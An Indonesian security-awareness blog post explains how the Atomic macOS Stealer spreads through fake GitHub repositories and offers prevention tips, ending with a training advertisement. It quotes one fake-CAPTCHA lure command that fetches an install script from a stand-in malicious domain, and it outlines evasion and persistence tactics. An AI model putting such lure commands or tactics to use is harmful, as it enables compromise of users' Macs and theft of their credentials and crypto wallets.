Waspada! Malware Atomic Stealer Serang macOS Lewat GitHub Palsu. Begini Teknik Serangannya
Banyak orang percaya kalau macOS lebih aman dibandingkan sistem operasi lain seperti Windows. Tapi kenyataannya sekarang hacker menargetkan macOS dengan strategi baru yaitu Atomic macOS Stealer yang disebarkan melalui GitHub palsu.
Apa Itu Atomic Stealer (AMOS)?
Atomic Stealer (AMOS) adalah malware data stealer yang dirancang khusus untuk sistem macOS dengan tujuan mencuri data sensitif dari perangkat korban.
Data yang menjadi target antara lain:
-
Password dan cookies dari browser (Chrome, Safari, Firefox, Brave, Edge, dll.)
-
Wallet cryptocurrency (Bitcoin, Ethereum, dan aset digital lainnya)
-
Keychain data (penyimpanan password bawaan Mac)
-
File penting seperti dokumen, database, hingga arsip penting
-
Pesan aplikasi seperti Telegram, WhatsApp dll
Setelah masuk ke perangkat korban, AMOS langsung bekerja diam-diam mengumpulkan data lalu mengirimkannya ke server milik hacker.
Cara Malware Ini Menyebar Lewat GitHub Palsu
Sebelumnya, AMOS banyak ditemukan di situs bajakan software seperti HaxMac yang menawarkan aplikasi populer secara gratis.
Nah, saat ini Hacker membuat repository GitHub palsu yang terlihat sangat meyakinkan.
1. Teknik Penyebaran
Menggunakan File Installer Palsu (.dmg atau .pkg):
- Hacker menyamarkan AMOS sebagai installer untuk aplikasi populer, seperti tools open-source atau program keamanan.
- File-file ini diberi nama yang meyakinkan (seperti,
CleanTool_v2.3.pkgatauXProtectInstaller.dmg) dan diunggah ke repositori GitHub palsu. - Saat pengguna menjalankan installer palsu ini, file tersebut akan menginstal aplikasi tiruan sambil secara diam-diam menjalankan skrip berbahaya untuk menyebarkan AMOS.
Baca juga : Pelatihan & Sertifikasi Cyber Security Analyst
Terminal Command Injection
Teknik ini terbukti sangat efektif dalam menyebarkan malware.
Korban biasanya tertarik setelah mengunjungi situs web seperti haxmac[.]cc untuk mencari software bajakan.
Meniru teknik "fake CAPTCHA" yang biasanya ditemui di malware Windows. Pengguna diminta untuk menyalin dan menempelkan perintah seperti:
curl -fsSL https://malicious-domain.com/install.sh
Dengan menjalankan perintah ini, pengguna secara sukarela mengeksekusi kode berbahaya yang mengunduh AMOS langsung ke sistem mereka, sehingga melewati proteksi keamanan macOS seperti Gatekeeper.
2 Teknik Evasion
Atomic Stealer menggunakan berbagai teknik evasion (penghindaran) agar sulit terdeteksi. Berikut beberapa strategi yang digunakan:
|
Teknik Evasion |
Penjelasan |
Dampaknya |
|
Domain Rotation |
Mengganti domain server secara berkala |
Sulit dilacak & cepat berpindah target |
|
Environment Detection |
Mengecek apakah sistem berjalan di virtual machine (VM) |
Menghindari analisis peneliti keamanan |
|
Living-off-the-Land |
Memanfaatkan tools bawaan macOS seperti curl, osascript, dan AppleScript |
Aktivitas malware terlihat “normal” di sistem |
|
Persistence |
Membuat file tersembunyi (.helper, .agent) dan menambahkan LaunchDaemon |
Malware tetap aktif meski Mac di restart |
Baca juga : Blue Team and Defense Strategy
Kenapa MacOS Jadi Target Serangan?
Dulu, hacker lebih fokus menyerang Windows karena basis penggunanya jauh lebih besar. Namun, ada beberapa alasan kenapa sekarang Mac semakin sering jadi target:
-
Pengguna Mac banyak dari kalangan profesional & pekerja kreatif. Data mereka biasanya lebih berharga.
-
Popularitas Mac di kalangan high-value target seperti pengusaha, pengembang aplikasi, hingga pemilik aset kripto.
-
Sangat percaya terhadap keamanan Apple.
Cara Mencegah Infeksi AMOS
Ada beberapa langkah pencegahan agar perangkat Mac Anda tetap aman:
-
Jangan asal download software: Pastikan download hanya dari situs resmi atau App Store.
-
Hati-hati dengan GitHub palsu: Cek reputasi akun, jumlah kontribusi, dan komentar pengguna sebelum menjalankan script apa pun.
-
Aktifkan Gatekeeper: Fitur ini bisa memblokir aplikasi tidak dikenal yang tidak ditandatangani Apple.
-
Gunakan antivirus khusus Mac: Banyak solusi modern bisa mendeteksi perilaku mencurigakan dari malware seperti AMOS.
-
Selalu update macOS: Patch keamanan terbaru bisa menutup celah yang dimanfaatkan malware.
Kesimpulan
Munculnya Atomic Stealer via GitHub palsu menjadi alarm keras bagi semua pengguna Mac.
Cyber Security bukan soal sistem operasi mana yang dipakai, tapi bagaimana cara kita menjaga diri dari banyaknya jebakan malware.
Malware ini jadi bukti kalau:
-
macOS tidak kebal terhadap serangan siber.
-
Hacker makin kreatif mencari celah.
-
Pentingnya cyber security awareness untuk semua orang.
🚀Tingkatkan Literasi Cyber Security Anda Sebelum Terlambat!
Serangan siber dapat menyerang siapa saja, apalagi perusahaan besar, perbankan dan pemerintahan.
Kini saatnya memperkuat tim IT atau tim Cyber Security Anda dengan mengikuti pelatihan dan sertifikasi di bidang cyber security di SUHU.
Berikut rekomendasi pelatihan untuk Anda atau tim IT Anda:
Silakan konsultasikan kebutuhan Anda bersama kami dengan klik link berikut: https://bit.ly/kontaksuhu